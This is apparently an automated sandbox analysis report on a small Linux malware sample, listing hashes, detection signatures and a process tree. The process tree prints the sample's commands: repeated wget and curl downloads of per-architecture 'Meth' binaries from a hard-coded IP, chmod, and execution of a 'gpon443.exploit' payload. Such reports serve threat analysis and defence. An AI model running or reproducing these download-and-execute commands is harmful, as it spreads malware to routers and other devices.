Analysis
-
max time kernel
78s -
max time network
79s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-07-2024 03:58
Static task
static1
Behavioral task
behavioral1
Sample
084300db84b72d190951f7cca78ee9e3_JaffaCakes118
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
084300db84b72d190951f7cca78ee9e3_JaffaCakes118
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
084300db84b72d190951f7cca78ee9e3_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
084300db84b72d190951f7cca78ee9e3_JaffaCakes118
Resource
debian9-mipsel-20240729-en
General
-
Target
084300db84b72d190951f7cca78ee9e3_JaffaCakes118
-
Size
3KB
-
MD5
084300db84b72d190951f7cca78ee9e3
-
SHA1
a3a989180ea0ffa677ed97f1a3747c771caee062
-
SHA256
d3e494fd077267d03723741a3278cd232b9aeea49533f4d218f3669a049be23f
-
SHA512
ad0f90a8eb754101ce13fc19d18dc3d801aa297138aeb83b3e0e4ead97ec7c7d35b46e8834d2553385cad5bef0e8f281b5a6fdca8ce1a7a7bb4dac52eabcdef8
Malware Config
Signatures
-
Executes dropped EXE 13 IoCs
Processes:
sn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtsn0rtioc pid process /tmp/sn0rt 668 sn0rt /tmp/sn0rt 675 sn0rt /tmp/sn0rt 682 sn0rt /tmp/sn0rt 690 sn0rt /tmp/sn0rt 696 sn0rt /tmp/sn0rt 708 sn0rt /tmp/sn0rt 714 sn0rt /tmp/sn0rt 722 sn0rt /tmp/sn0rt 730 sn0rt /tmp/sn0rt 736 sn0rt /tmp/sn0rt 744 sn0rt /tmp/sn0rt 750 sn0rt /tmp/sn0rt 758 sn0rt -
Checks CPU configuration 1 TTPs 13 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads runtime system information 26 IoCs
Reads data from /proc virtual filesystem.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
084300db84b72d190951f7cca78ee9e3_JaffaCakes118description ioc process File opened for modification /tmp/sn0rt 084300db84b72d190951f7cca78ee9e3_JaffaCakes118
Processes
-
/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes118/tmp/084300db84b72d190951f7cca78ee9e3_JaffaCakes1181⤵
- Writes file to tmp directory
PID:657 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x862⤵PID:658
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.x862⤵
- Checks CPU configuration
- Reads runtime system information
PID:665 -
/bin/catcat Meth.x862⤵PID:666
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi2⤵PID:667
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:668 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips2⤵PID:670
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mips2⤵
- Checks CPU configuration
- Reads runtime system information
PID:671 -
/bin/catcat Meth.mips2⤵PID:673
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi2⤵PID:674
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:675 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl2⤵PID:677
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
PID:679 -
/bin/catcat Meth.mpsl2⤵PID:680
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi2⤵PID:681
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:682 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm2⤵PID:684
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm2⤵
- Checks CPU configuration
- Reads runtime system information
PID:685 -
/bin/catcat Meth.arm2⤵PID:688
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi2⤵PID:689
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:690 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm52⤵PID:692
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm52⤵
- Checks CPU configuration
- Reads runtime system information
PID:693 -
/bin/catcat Meth.arm52⤵PID:694
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt systemd-private-7be067a6c62a4da9b1091f4ce1640774-systemd-timedated.service-FWSqzi2⤵PID:695
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:696 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm62⤵PID:699
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm62⤵
- Checks CPU configuration
- Reads runtime system information
PID:705 -
/bin/catcat Meth.arm62⤵PID:706
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:707
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:708 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm72⤵PID:710
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arm72⤵
- Checks CPU configuration
- Reads runtime system information
PID:711 -
/bin/catcat Meth.arm72⤵PID:712
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:713
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:714 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc2⤵PID:716
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:719 -
/bin/catcat Meth.ppc2⤵PID:720
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:721
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:722 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k2⤵PID:724
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
PID:725 -
/bin/catcat Meth.m68k2⤵PID:728
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:729
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:730 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc2⤵PID:732
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.spc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:733 -
/bin/catcat Meth.spc2⤵PID:734
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:735
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:736 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i6862⤵PID:738
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.i6862⤵
- Checks CPU configuration
- Reads runtime system information
PID:741 -
/bin/catcat Meth.i6862⤵PID:742
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:743
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:744 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh42⤵PID:746
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.sh42⤵
- Checks CPU configuration
- Reads runtime system information
PID:747 -
/bin/catcat Meth.sh42⤵PID:748
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:749
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:750 -
/usr/bin/wgetwget http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc2⤵PID:752
-
/usr/bin/curlcurl -O http://45.95.168.230/taevimncorufglbzhwxqpdkjs/Meth.arc2⤵
- Checks CPU configuration
- Reads runtime system information
PID:755 -
/bin/catcat Meth.arc2⤵PID:756
-
/bin/chmodchmod +x 084300db84b72d190951f7cca78ee9e3_JaffaCakes118 sn0rt2⤵PID:757
-
/tmp/sn0rt./sn0rt gpon443.exploit2⤵
- Executes dropped EXE
PID:758